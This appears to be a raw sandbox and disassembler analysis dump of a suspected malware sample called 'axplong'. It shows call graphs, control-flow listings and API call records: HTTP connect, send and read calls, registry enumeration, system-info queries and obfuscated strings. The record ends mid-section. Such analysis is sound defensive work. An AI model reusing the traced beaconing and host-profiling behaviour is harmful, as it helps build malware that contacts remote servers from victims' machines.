13286->13291 13288 f56465 13289 f5646a GetPEB 13288->13289 13290 f5647a __fassign 13288->13290 13289->13290 13292 f5a1dc __fassign 13291->13292 13292->13288 13294 f5e57b 13293->13294 13297 f5e489 13294->13297 13296 f5e581 13296->13257 13300 f5e495 __fassign ___free_lconv_mon 13297->13300 13298 f5e4b6 13298->13296 13299 f58aaf __fassign 4 API calls 13301 f5e528 13299->13301 13300->13298 13300->13299 13302 f5e564 13301->13302 13306 f5a5ee 13301->13306 13302->13296 13307 f5a611 13306->13307 13308 f58aaf __fassign 4 API calls 13307->13308 13309 f5a687 13308->13309 13311 f5683a __fassign 4 API calls 13310->13311 13312 f5d32a 13311->13312 13314 f5d33a 13312->13314 13319 f5f07f 13312->13319 13314->13249 13316 f5d2f4 13315->13316 13317 f5b4bb __fassign 4 API calls 13316->13317 13318 f5d304 13317->13318 13318->13249 13320 f5683a __fassign 4 API calls 13319->13320 13321 f5f09f __cftof __fassign __freea 13320->13321 13321->13314 13323 f565ae 13322->13323 13324 f565b5 __cftof __dosmaperr 13323->13324 13326 f5a783 13323->13326 13324->13202 13327 f5a78f 13326->13327 13330 f5a827 13327->13330 13329 f5a7aa 13329->13324 13331 f5a84a 13330->13331 13333 f5a890 ___free_lconv_mon 13331->13333 13334 f5d6ef 13331->13334 13333->13329 13337 f5d6fc __fassign 13334->13337 13335 f5d727 RtlAllocateHeap 13336 f5d73a __dosmaperr 13335->13336 13335->13337 13336->13333 13337->13335 13337->13336 13339 f56692 13338->13339 13341 f5667d __cftof __dosmaperr ___free_lconv_mon 13338->13341 13339->13341 13342 f59ef9 13339->13342 13341->13206 13343 f59f11 13342->13343 13345 f59f36 13342->13345 13343->13345 13346 f602f8 13343->13346 13345->13341 13347 f60304 13346->13347 13349 f6030c __cftof __dosmaperr 13347->13349 13350 f603ea 13347->13350 13349->13345 13351 f6040c 13350->13351 13353 f60410 __cftof __dosmaperr 13350->13353 13351->13353 13354 f5fb7f 13351->13354 13353->13349 13355 f5fbcc 13354->13355 13356 f5683a __fassign 4 API calls 13355->13356 13359 f5fbdb __cftof 13356->13359 13357 f5d2e9 4 API calls 13357->13359 13358 f5fe7b 13358->13353 13359->13357 13359->13358 13360 f5c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13359->13360 13360->13359 13362 f2bdb2 13361->13362 13364 f2c14e shared_ptr 13361->13364 13363 f2bdc6 InternetOpenW InternetConnectA 13362->13363 13362->13364 13365 f2be3d shared_ptr 13363->13365 13364->13211 13366 f2bf13 HttpSendRequestA 13365->13366 13367 f2bf2b shared_ptr 13366->13367 13368 f2bfb3 InternetReadFile 13367->13368 13369 f2bfda 13368->13369 13370 f2c05f InternetReadFile 13369->13370 13370->13369 13839 f39310 13840 f39325 13839->13840 13844 f39363 13839->13844 13841 f3d041 SleepConditionVariableCS 13840->13841 13842 f3932f 13841->13842 13843 f3cff7 RtlWakeAllConditionVariable 13842->13843 13842->13844 13843->13844 13742 f56559 13743 f563f7 __fassign 2 API calls 13742->13743 13744 f5656a 13743->13744 13613 f3b85e 13618 f3b6e5 13613->13618 13615 f3b886 13626 f3b648 13615->13626 13617 f3b89f 13620 f3b6f1 Concurrency::details::_Reschedule_chore 13618->13620 13619 f3b722 13619->13615 13620->13619 13636 f3c5dc 13620->13636 13624 f3b70c __Mtx_unlock 13625 f22ad0 10 API calls 13624->13625 13625->13619 13627 f3b654 Concurrency::details::_Reschedule_chore 13626->13627 13628 f3c5dc GetSystemTimePreciseAsFileTime 13627->13628 13630 f3b6ae 13627->13630 13629 f3b669 13628->13629 13631 f22ad0 10 API calls 13629->13631 13630->13617 13632 f3b66f __Mtx_unlock 13631->13632 13633 f22ad0 10 API calls 13632->13633 13634 f3b68c __Cnd_broadcast 13633->13634 13634->13630 13635 f22ad0 10 API calls 13634->13635 13635->13630 13644 f3c382 13636->13644 13638 f3b706 13639 f22ad0 13638->13639 13640 f22ada 13639->13640 13641 f22adc 13639->13641 13640->13624 13661 f3c19a 13641->13661 13645 f3c3d8 13644->13645 13647 f3c3aa 13644->13647 13645->13647 13650 f3ce9b 13645->13650 13647->13638 13648 f3c42d __Xtime_diff_to_millis2 13648->13647 13649 f3ce9b _xtime_get GetSystemTimePreciseAsFileTime 13648->13649 13649->13648 13651 f3ceaa 13650->13651 13653 f3ceb7 __aulldvrm 13650->13653 13651->13653 13654 f3ce74 13651->13654 13653->13648 13657 f3cb1a 13654->13657 13658 f3cb37 13657->13658 13659 f3cb2b GetSystemTimePreciseAsFileTime 13657->13659 13658->13653 13659->13658 13662 f3c1c2 13661->13662 13663 f3c1a4 13661->13663 13662->13662 13663->13662 13665 f3c1c7 13663->13665 13668 f22aa0 13665->13668 13667 f3c1de std::_Throw_future_error 13667->13663 13682 f3be0f 13668->13682 13670 f22abf 13670->13667 13671 f58aaf __fassign 4 API calls 13673 f56c26 13671->13673 13672 f22ab4 13672->13670 13672->13671 13674 f56c35 13673->13674 13675 f56c43 13673->13675 13676 f56c99 9 API calls 13674->13676 13677 f568bd 4 API calls 13675->13677 13678 f56c3f 13676->13678 13679 f56c5d 13677->13679 13678->13667 13680 f56c99 9 API calls 13679->13680 13681 f56c71 ___free_lconv_mon 13679->13681 13680->13681 13681->13667 13685 f3cb61 13682->13685 13686 f3cb6f InitOnceExecuteOnce 13685->13686 13688 f3be22 13685->13688 13686->13688 13688->13672 13699 f27400 13700 f27435 shared_ptr 13699->13700 13704 f2752f shared_ptr 13700->13704 13705 f3d041 13700->13705 13702 f275bd 13702->13704 13709 f3cff7 13702->13709 13707 f3d052 13705->13707 13706 f3d05a 13706->13702 13707->13706 13713 f3d0c9 13707->13713 13711 f3d006 13709->13711 13710 f3d0af 13710->13704 13711->13710 13712 f3d0ab RtlWakeAllConditionVariable 13711->13712 13712->13704 13714 f3d0d7 SleepConditionVariableCS 13713->13714 13716 f3d0f0 13713->13716 13714->13716 13716->13707 13478 f36ae0 13479 f36b10 13478->13479 13482 f346c0 13479->13482 13481 f36b5c Sleep 13481->13479 13484 f34d80 shared_ptr 13482->13484 13486 f346fb 13482->13486 13483 f34e69 shared_ptr 13483->13481 13484->13483 13510 f265b0 13484->13510 13486->13484 13487 f2bd60 5 API calls 13486->13487 13498 f34753 shared_ptr __dosmaperr 13487->13498 13488 f34f25 shared_ptr 13489 f34fee shared_ptr 13488->13489 13493 f36ab6 13488->13493 13518 f27d00 13489->13518 13491 f34ffd 13524 f282b0 13491->13524 13495 f346c0 16 API calls 13493->13495 13494 f34a0d 13494->13484 13496 f2bd60 5 API calls 13494->13496 13497 f36b5c Sleep 13495->13497 13500 f34a72 shared_ptr 13496->13500 13497->13493 13498->13494 13499 f58979 4 API calls 13498->13499 13499->13494 13500->13484 13503 f342a0 13500->13503 13502 f35016 shared_ptr 13502->13481 13504 f342e2 13503->13504 13505 f34556 13504->13505 13508 f34308 shared_ptr 13504->13508 13507 f33550 14 API calls 13505->13507 13506 f34520 shared_ptr 13506->13484 13507->13506 13508->13506 13528 f33550 13508->13528 13511 f2660f 13510->13511 13512 f22280 4 API calls 13511->13512 13513 f26699 shared_ptr 13512->13513 13514 f22280 4 API calls 13513->13514 13515 f26822 shared_ptr 13513->13515 13516 f26727 shared_ptr 13514->13516 13515->13488 13516->13515 13517 f22280 4 API calls 13516->13517 13517->13516 13519 f27d66 shared_ptr __cftof 13518->13519 13520 f27ea3 GetNativeSystemInfo 13519->13520 13521 f27ea7 13519->13521 13523 f27eb8 shared_ptr 13519->13523 13520->13521 13521->13523 13603 f58a81 13521->13603 13523->13491 13525 f28315 shared_ptr __cftof 13524->13525 13526 f28454 GetNativeSystemInfo 13525->13526 13527 f28333 13525->13527 13526->13527 13527->13502 13529 f33ab2 shared_ptr std::_Xinvalid_argument 13528->13529 13530 f3358f shared_ptr 13528->13530 13529->13508 13530->13529 13536 f338f5 shared_ptr __dosmaperr 13530->13536 13539 f2aca0 13530->13539 13531 f58979 4 API calls 13532 f33a8a 13531->13532 13532->13529 13534 f33e52 13532->13534 13537 f33b9d 13532->13537 13561 f32e20 13534->13561 13536->13529 13536->13531 13544 f31dd0 13537->13544 13541 f2adf0 __cftof 13539->13541 13540 f2ae16 shared_ptr 13540->13536 13541->13540 13576 f25500 13541->13576 13543 f2af7e 13548 f31e6b shared_ptr __dosmaperr 13544->13548 13545 f31e78 13546 f2e440 6 API calls 13545->13546 13547 f32936 shared_ptr std::_Xinvalid_argument 13546->13547 13547->13529 13548->13545 13548->13547 13549 f58979 4 API calls 13548->13549 13550 f32265 shared_ptr 13549->13550 13550->13547 13551 f56659 RtlAllocateHeap 13550->13551 13552 f3267a 13551->13552 13552->13545 13553 f566e7 4 API calls 13552->13553 13554 f3268b shared_ptr __dosmaperr 13553->13554 13554->13547 13555 f58979 4 API calls 13554->13555 13556 f32759 13555->13556 13556->13545 13556->13547 13557 f327d1 13556->13557 13558 f2e440 6 API calls 13557->13558 13559 f32843 13558->13559 13559->13547 13560 f25df0 2 API calls 13559->13560 13560->13547 13562 f32ec5 __cftof 13561->13562 13563 f332f2 InternetCloseHandle InternetCloseHandle 13562->13563 13564 f33331 13563->13564 13565 f2e440 6 API calls 13564->13565 13566 f33423 shared_ptr 13565->13566 13568 f2aca0 4 API calls 13566->13568 13570 f338f5 shared_ptr __dosmaperr 13566->13570 13573 f3351a shared_ptr std::_Xinvalid_argument 13566->13573 13567 f58979 4 API calls 13569 f33a8a 13567->13569 13568->13570 13571 f33e52 13569->13571 13569->13573 13574 f33b9d 13569->13574 13570->13567 13570->13573 13572 f32e20 12 API calls 13571->13572 13572->13573 13573->13529 13575 f31dd0 12 API calls 13574->13575 13575->13573 13577 f25520 13576->13577 13579 f25620 13577->13579 13580 f22280 13577->13580 13579->13543 13583 f22240 13580->13583 13584 f22256 13583->13584 13587 f58667 13584->13587 13590 f57456 13587->13590 13589 f22264 13589->13577 13591 f57496 13590->13591 13593 f5747e __cftof __dosmaperr 13590->13593 13592 f5683a __fassign 4 API calls 13591->13592 13591->13593 13594 f574ae 13592->13594 13593->13589 13596 f57a11 13594->13596 13597 f57a22 13596->13597 13598 f57a31 __cftof __dosmaperr 13597->13598 13599 f57c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13597->13599 13600 f57d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13597->13600 13601 f57fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13597->13601 13602 f57c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13597->13602 13598->13593 13599->13597 13600->13597 13601->13597 13602->13597 13604 f586d7 4 API calls 13603->13604 13605 f58a9f 13604->13605 13605->13523 13745 f3a140 13746 f3a1c0 13745->13746 13752 f37040 13746->13752 13748 f3a3ee shared_ptr 13749 f3a1fc shared_ptr 13749->13748 13756 f23ea0 13749->13756 13751 f3a3d6 13754 f37081 __cftof __Mtx_init_in_situ 13752->13754 13753 f372b6 13753->13749 13754->13753 13762 f22e80 13754->13762 13757 f23f08 13756->13757 13758 f23ede 13756->13758 13759 f23f18 13757->13759 13809 f22bc0 13757->13809 13758->13751 13759->13751 13763 f22ec6 13762->13763 13764 f22f3e GetCurrentThreadId 13762->13764 13765 f3c5dc GetSystemTimePreciseAsFileTime 13763->13765 13766 f22faf 13764->13766 13767 f22f54 13764->13767 13768 f22ed2 13765->13768 13766->13753 13767->13766 13772 f3c5dc GetSystemTimePreciseAsFileTime 13767->13772 13769 f22fde 13768->13769 13775 f22edd __Mtx_unlock 13768->13775 13770 f3c19a 10 API calls 13769->13770 13771 f22fe4 13770->13771 13773 f3c19a 10 API calls 13771->13773 13774 f22f79 13772->13774 13773->13774 13777 f3c19a 10 API calls 13774->13777 13778 f22f80 __Mtx_unlock 13774->13778 13775->13771 13776 f22f2f 13775->13776 13776->13764 13776->13766 13777->13778 13779 f3c19a 10 API calls 13778->13779 13780 f22f98 __Cnd_broadcast 13778->13780 13779->13780 13780->13766 13781 f3c19a 10 API calls 13780->13781 13782 f22ffc 13781->13782 13783 f3c5dc GetSystemTimePreciseAsFileTime 13782->13783 13791 f23040 shared_ptr __Mtx_unlock 13783->13791 13784 f23185 13785 f3c19a 10 API calls 13784->13785 13786 f2318b 13785->13786 13787 f3c19a 10 API calls 13786->13787 13788 f23191 13787->13788 13789 f3c19a 10 API calls 13788->13789 13797 f23153 __Mtx_unlock 13789->13797 13790 f23167 13790->13753 13791->13784 13791->13786 13791->13790 13793 f230f2 GetCurrentThreadId 13791->13793 13792 f3c19a 10 API calls 13794 f2319d 13792->13794 13793->13790 13795 f230fb 13793->13795 13795->13790 13796 f3c5dc GetSystemTimePreciseAsFileTime 13795->13796 13798 f2311f 13796->13798 13797->13790 13797->13792 13798->13784 13798->13788 13798->13797 13800 f3bc7c 13798->13800 13803 f3baa2 13800->13803 13802 f3bc8c 13802->13798 13804 f3bacc 13803->13804 13805 f3ce9b _xtime_get GetSystemTimePreciseAsFileTime 13804->13805 13808 f3bad4 __Xtime_diff_to_millis2 13804->13808 13806 f3baff __Xtime_diff_to_millis2 13805->13806 13807 f3ce9b _xtime_get GetSystemTimePreciseAsFileTime 13806->13807 13806->13808 13807->13808 13808->13802 13810 f22bce 13809->13810 13816 f3b777 13810->13816 13812 f22c02 13813 f22c09 13812->13813 13822 f22c40 13812->13822 13813->13751 13815 f22c18 std::_Throw_future_error 13817 f3b784 13816->13817 13821 f3b7a3 Concurrency::details::_Reschedule_chore 13816->13821 13825 f3caa7 13817->13825 13819 f3b794 13819->13821 13827 f3b74e 13819->13827 13821->13812 13833 f3b72b 13822->13833 13824 f22c72 shared_ptr 13824->13815 13826 f3cac2 CreateThreadpoolWork 13825->13826 13826->13819 13828 f3b757 Concurrency::details::_Reschedule_chore 13827->13828 13831 f3ccfc 13828->13831 13830 f3b771 13830->13821 13832 f3cd11 TpPostWork 13831->13832 13832->13830 13834 f3b737 13833->13834 13835 f3b747 13833->13835 13834->13835 13837 f3c9a8 13834->13837 13835->13824 13838 f3c9bd TpReleaseWork 13837->13838 13838->13835 13845 f38700 13846 f3875a __cftof 13845->13846 13852 f39ae0 13846->13852 13848 f38784 13851 f3879c 13848->13851 13856 f243b0 13848->13856 13850 f38809 std::_Throw_future_error 13853 f39b15 13852->13853 13862 f22ca0 13853->13862 13855 f39b46 13855->13848 13857 f3be0f InitOnceExecuteOnce 13856->13857 13858 f243ca 13857->13858 13859 f243d1 13858->13859 13860 f56beb 9 API calls 13858->13860 13859->13850 13861 f243e4 13860->13861 13863 f22cdd 13862->13863 13864 f3be0f InitOnceExecuteOnce 13863->13864 13865 f22d06 13864->13865 13866 f22d48 13865->13866 13867 f22d11 13865->13867 13871 f3be27 13865->13871 13878 f22400 13866->13878 13867->13855 13872 f3be33 std::_Throw_future_error 13871->13872 13873 f3bea3 13872->13873 13874 f3be9a 13872->13874 13876 f22aa0 10 API calls 13873->13876 13881 f3bdaf 13874->13881 13877 f3be9f 13876->13877 13877->13866 13899 f3b506 13878->13899 13880 f22432 13882 f3cb61 InitOnceExecuteOnce 13881->13882 13883 f3bdc7 13882->13883 13884 f3bdce 13883->13884 13887 f56beb 13883->13887 13884->13877 13886 f3bdd7 13886->13877 13892 f56bf7 13887->13892 13888 f58aaf __fassign 4 API calls 13889 f56c26 13888->13889 13890 f56c35 13889->13890 13891 f56c43 13889->13891 13893 f56c99 9 API calls 13890->13893 13894 f568bd 4 API calls 13891->13894 13892->13888 13895 f56c3f 13893->13895 13896 f56c5d 13894->13896 13895->13886 13897 f56c99 9 API calls 13896->13897 13898 f56c71 ___free_lconv_mon 13896->13898 13897->13898 13898->13886 13900 f3b521 std::_Throw_future_error 13899->13900 13901 f58aaf __fassign 4 API calls 13900->13901 13903 f3b588 __fassign 13900->13903 13902 f3b5cf 13901->13902 13903->13880 13371 f5d6ef 13374 f5d6fc __fassign 13371->13374 13372 f5d727 RtlAllocateHeap 13373 f5d73a __dosmaperr 13372->13373 13372->13374 13374->13372 13374->13373 13717 f3b7e9 13718 f3b6e5 11 API calls 13717->13718 13719 f3b811 Concurrency::details::_Reschedule_chore 13718->13719 13720 f3b836 13719->13720 13724 f3cade 13719->13724 13722 f3b648 11 API calls 13720->13722 13723 f3b84e 13722->13723 13725 f3cafc 13724->13725 13726 f3caec TpCallbackUnloadDllOnCompletion 13724->13726 13725->13720 13726->13725 13375 f56beb 13380 f56bf7 13375->13380 13376 f58aaf __fassign 4 API calls 13377 f56c26 13376->13377 13378 f56c35 13377->13378 13379 f56c43 13377->13379 13381 f56c99 9 API calls 13378->13381 13387 f568bd 13379->13387 13380->13376 13383 f56c3f 13381->13383 13384 f56c5d 13386 f56c71 ___free_lconv_mon 13384->13386 13390 f56c99 13384->13390 13388 f5683a __fassign 4 API calls 13387->13388 13389 f568cf 13388->13389 13389->13384 13391 f56cc4 __cftof 13390->13391 13397 f56ca7 __cftof __dosmaperr 13390->13397 13392 f56d06 CreateFileW 13391->13392 13398 f56cea __cftof __dosmaperr 13391->13398 13393 f56d38 13392->13393 13394 f56d2a 13392->13394 13413 f56d77 13393->13413 13399 f56e01 GetFileType 13394->13399 13397->13386 13398->13386 13400 f56e3c 13399->13400 13412 f56ed2 __dosmaperr 13399->13412 13401 f56e56 __cftof 13400->13401 13435 f57177 13400->13435 13403 f56e75 GetFileInformationByHandle 13401->13403 13401->13412 13404 f56e8b 13403->13404 13403->13412 13421 f570c9 13404->13421 13408 f56ea8 13409 f56f71 SystemTimeToTzSpecificLocalTime 13408->13409 13410 f56ebb 13409->13410 13411 f56f71 SystemTimeToTzSpecificLocalTime 13410->13411 13411->13412 13412->13398 13454 f57314 13413->13454 13415 f56d85 13416 f56d8a __dosmaperr 13415->13416 13417 f570c9 4 API calls 13415->13417 13416->13398 13418 f56da3 13417->13418 13419 f57177 RtlAllocateHeap 13418->13419 13420 f56dc2 13419->13420 13420->13398 13422 f570df _wcsrchr 13421->13422 13430 f56e97 13422->13430 13439 f5b9e4 13422->13439 13424 f57123 13425 f5b9e4 4 API calls 13424->13425 13424->13430 13426 f57134 13425->13426 13427 f5b9e4 4 API calls 13426->13427 13426->13430 13428 f57145 13427->13428 13429 f5b9e4 4 API calls 13428->13429 13428->13430 13429->13430 13431 f56f71 13430->13431 13432 f56f89 13431->13432 13433 f56fa9 SystemTimeToTzSpecificLocalTime 13432->13433 13434 f56f8f 13432->13434 13433->13434 13434->13408 13436 f57190 13435->13436 13438 f571a4 __dosmaperr 13436->13438 13450 f5b568 13436->13450 13438->13401 13440 f5b9f2 13439->13440 13443 f5b9f8 __cftof __dosmaperr 13440->13443 13444 f5ba2d 13440->13444 13442 f5ba28 13442->13424 13443->13424 13445 f5ba57 13444->13445 13447 f5ba3d __cftof __dosmaperr 13444->13447 13446 f5683a __fassign 4 API calls 13445->13446 13445->13447 13449 f5ba81 13446->13449 13447->13442 13448 f5b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13448->13449 13449->13447 13449->13448 13451 f5b592 __cftof 13450->13451 13452 f5b5ae __dosmaperr ___free_lconv_mon 13451->13452 13453 f5d6ef RtlAllocateHeap 13451->13453 13452->13438 13453->13452 13455 f57338 13454->13455 13457 f5733e 13455->13457 13458 f57036 13455->13458 13457->13415 13459 f57042 __dosmaperr 13458->13459 13464 f5b87b 13459->13464 13461 f5705a __dosmaperr 13462 f57068 13461->13462 13463 f5b87b RtlAllocateHeap 13461->13463 13462->13457 13463->13462 13467 f5b6de 13464->13467 13466 f5b894 13466->13461 13468 f5b6ee 13467->13468 13470 f5b6f5 13468->13470 13471 f61ef8 13468->13471 13470->13466 13474 f61d22 13471->13474 13473 f61f0f 13473->13470 13475 f61d54 13474->13475 13477 f61d40 __cftof __dosmaperr 13474->13477 13476 f5b568 RtlAllocateHeap 13475->13476 13475->13477 13476->13477 13477->13473

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 770 f2bd60-f2bdac 771 f2bdb2-f2bdb6 770->771 772 f2c1a1-f2c1c6 call f37f30 770->772 771->772 773 f2bdbc-f2bdc0 771->773 778 f2c1f4-f2c20c 772->778 779 f2c1c8-f2c1d4 772->779 773->772 775 f2bdc6-f2be4f InternetOpenW InternetConnectA call f37870 call f25b20 773->775 804 f2be53-f2be6f 775->804 805 f2be51 775->805 782 f2c212-f2c21e 778->782 783 f2c158-f2c170 778->783 780 f2c1d6-f2c1e4 779->780 781 f2c1ea-f2c1f1 call f3d593 779->781 780->781 785 f2c26f-f2c274 call f56b9a 780->785 781->778 787 f2c224-f2c232 782->787 788 f2c14e-f2c155 call f3d593 782->788 789 f2c243-f2c25f call f3cf21 783->789 790 f2c176-f2c182 783->790 787->785 794 f2c234 787->794 788->783 795 f2c188-f2c196 790->795 796 f2c239-f2c240 call f3d593 790->796 794->788 795->785 803 f2c19c 795->803 796->789 803->796 809 f2bea0-f2bf0f call f37870 call f25b20 call f37870 call f25b20 804->809 810 f2be71-f2be80 804->810 805->804 823 f2bf13-f2bf29 HttpSendRequestA 809->823 824 f2bf11 809->824 811 f2be82-f2be90 810->811 812 f2be96-f2be9d call f3d593 810->812 811->812 812->809 825 f2bf5a-f2bf82 823->825 826 f2bf2b-f2bf3a 823->826 824->823 829 f2bfb3-f2bfda InternetReadFile 825->829 830 f2bf84-f2bf93 825->830 827 f2bf50-f2bf57 call f3d593 826->827 828 f2bf3c-f2bf4a 826->828 827->825 828->827 837 f2bfe0-f2c088 call f54180 InternetReadFile 829->837 832 f2bf95-f2bfa3 830->832 833 f2bfa9-f2bfb0 call f3d593 830->833 832->833 833->829 845 f2c08a-f2c090 837->845 845->837
                      APIs
                      • InternetOpenW.WININET(00F78D70,00000000,00000000,00000000,00000000), ref: 00F2BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F2BE11
                      • HttpSendRequestA.WININET(?,00000000), ref: 00F2BF1A
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00F2BFCC
                      • InternetReadFile.WININET(?,?,000003FF,?,?,?,?,?), ref: 00F2C081
                      • InternetCloseHandle.WININET(?), ref: 00F2C0A7
                      • InternetCloseHandle.WININET(?), ref: 00F2C0AF
                      • InternetCloseHandle.WININET(?), ref: 00F2C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$FileRead$ConnectHttpOpenRequestSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 471287134-332458646
                      • Opcode ID: 60190b7e07fec772cde59e99ed5b36d82599ca1978fe12c8b202df9133249658
                      • Instruction ID: e99674daae2b6f3c8babc3e0a3c5f4dd6dfc26be77dbdf08241d8bc79c4bb781
                      • Opcode Fuzzy Hash: 60190b7e07fec772cde59e99ed5b36d82599ca1978fe12c8b202df9133249658
                      • Instruction Fuzzy Hash: 11B104B1A00128DBEB24CF28DC85BEEBB79EF45314F5041A9F908972C1DB749AC0DB95
                      APIs
                        • Part of subcall function 00F37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F3795C
                        • Part of subcall function 00F37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00F37968
                        • Part of subcall function 00F37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00F37971
                        • Part of subcall function 00F2BD60: InternetOpenW.WININET(00F78D70,00000000,00000000,00000000,00000000), ref: 00F2BDED
                        • Part of subcall function 00F2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F2BE11
                      • std::_Xinvalid_argument.LIBCPMT ref: 00F34EA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f20000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpenXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2549319220-1662704651
                      • Opcode ID: 88cc794363a4b35efe7c3bb2759a309c0977f3be87e8ded901d96415304f91f5
                      • Instruction ID: de7453bde7d2cb847389f8760097d92ab83447b022f8be2f241b9636576c72f5
                      • Opcode Fuzzy Hash: 88cc794363a4b35efe7c3bb2759a309c0977f3be87e8ded901d96415304f91f5
                      • Instruction Fuzzy Hash: 43233671E002589BEF19DB28CD8979DBB729F81324F5481D8E008AB2D6DB399F84DF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 925 f25df0-f25eee 931 f25ef0-f25efc 925->931 932 f25f18-f25f25 call f3cf21 925->932 934 f25f0e-f25f15 call f3d593 931->934 935 f25efe-f25f0c 931->935 934->932 935->934 937 f25f26-f260ad call f56b9a call f3e080 call f37f30 * 5 RegOpenKeyExA 935->937 954 f260b3-f26143 call f54020 937->954 955 f26478-f26481 937->955 983 f26466-f26472 954->983 984 f26149-f2614d 954->984 957 f26483-f2648e 955->957 958 f264ae-f264b7 955->958 962 f26490-f2649e 957->962 963 f264a4-f264ab call f3d593 957->963 959 f264e4-f264ed 958->959 960 f264b9-f264c4 958->960 967 f2651a-f26523 959->967 968 f264ef-f264fa 959->968 965 f264c6-f264d4 960->965 966 f264da-f264e1 call f3d593 960->966 962->963 969 f2659e-f265a3 call f56b9a 962->969 963->958 965->966 965->969 966->959 976 f26525-f26530 967->976 977 f2654c-f26555 967->977 973 f26510-f26517 call f3d593 968->973 974 f264fc-f2650a 968->974 973->967 974->969 974->973 978 f26542-f26549 call f3d593 976->978 979 f26532-f26540 976->979 980 f26582-f2659d call f3cf21 977->980 981 f26557-f26566 977->981 978->977 979->969 979->978 988 f26578-f2657f call f3d593 981->988 989 f26568-f26576 981->989 983->955 990 f26153-f26187 RegEnumValueW 984->990 991 f26460 984->991 988->980 989->969 989->988 996 f2644d-f26454 990->996 997 f2618d-f261ad 990->997 991->983 996->990 1000 f2645a 996->1000 1002 f261b0-f261b9 997->1002 1000->991 1002->1002 1003 f261bb-f2624d call f37c50 call f38090 call f37870 * 2 call f25c60 1002->1003 1003->996
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true
                      • Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
